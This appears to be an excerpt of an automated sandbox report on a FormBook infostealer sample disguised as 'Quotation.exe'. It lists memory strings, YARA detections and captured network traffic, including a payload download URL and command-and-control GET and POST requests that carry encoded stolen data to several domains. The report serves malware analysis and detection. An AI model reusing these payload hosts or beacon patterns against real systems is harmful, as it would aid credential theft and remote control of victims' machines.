Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/cc6424a
Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26408426098.0000000002BF7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26443929724.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23184882295.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22674613619.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22642464266.0000000002BF7000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/other/7-common-travel-mistakes-every-rv-owner-has-made/ss-AAOGa8l
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_domains_btn&
Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/action_constructor.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=sh
Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/domains/check?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/help/faq?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_faq&
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/help/feedback?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/hosting?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_hosti
Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/scripts/shop_window.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=s
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl&wn_ca
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl2&wn_c
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl_banne
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/wn/img/email/logo-bottom.png
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru/wn/img/logo-horizontal.svg
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.webnames.ru?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_logo&wn_campa
Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.wittofitentertainment.com/
Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.wittofitentertainment.com/N
Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757935753.0000000003207000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.bin
Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.bin0
Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.binR
Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.binZ
Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
Source: unknown HTTP traffic detected: POST /d91r/ HTTP/1.1Host: www.cardinialethanol.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.cardinialethanol.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cardinialethanol.com/d91r/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 34 3d 38 48 4c 51 72 42 73 6a 77 64 65 56 55 5f 33 79 73 58 4f 4f 45 48 79 6b 4c 70 76 52 41 71 75 70 6b 59 33 32 72 75 4e 52 6a 51 42 61 74 61 50 34 46 66 4a 5f 37 36 4a 6c 4f 46 62 59 34 51 6b 36 56 33 68 46 64 54 61 6a 74 4e 38 30 49 78 51 45 59 58 45 6c 54 37 30 76 5a 6f 65 4f 64 51 54 6f 54 6d 6c 58 72 36 53 75 34 69 6e 5a 6c 4b 77 6d 52 35 7a 52 4a 4f 68 79 76 67 6a 79 64 6f 6a 75 78 4b 56 6d 55 5a 57 69 59 70 38 72 4b 49 57 43 51 48 74 64 61 74 50 4d 62 73 28 32 39 72 56 32 44 59 47 69 75 39 51 58 6e 37 50 42 30 77 50 61 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z4=8HLQrBsjwdeVU_3ysXOOEHykLpvRAqupkY32ruNRjQBataP4FfJ_76JlOFbY4Qk6V3hFdTajtN80IxQEYXElT70vZoeOdQToTmlXr6Su4inZlKwmR5zRJOhyvgjydojuxKVmUZWiYp8rKIWCQHtdatPMbs(29rV2DYGiu9QXn7PB0wPaWg).
Source: unknown DNS traffic detected: queries for: www.wittofitentertainment.com
Source: global traffic HTTP traffic detected: GET /kGQffjENy187.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wittofitentertainment.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&6SE=F8zFuLn HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&6SE=F8zFuLn HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&6SE=F8zFuLn HTTP/1.1Host: www.buymyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn HTTP/1.1Host: www.184411.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&6SE=F8zFuLn HTTP/1.1Host: www.b-tek.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn HTTP/1.1Host: www.dexmart.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn HTTP/1.1Host: www.maxhaidt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&6SE=F8zFuLn HTTP/1.1Host: www.aznqmd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&6SE=F8zFuLn HTTP/1.1Host: www.texasgent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&6SE=F8zFuLn HTTP/1.1Host: www.brightfms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&6SE=F8zFuLn HTTP/1.1Host: www.eta-trader.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&6SE=F8zFuLn HTTP/1.1Host: www.funvacayflorida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49854 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_0040523F

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands
barindex
Found potential ransomware demand text
Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
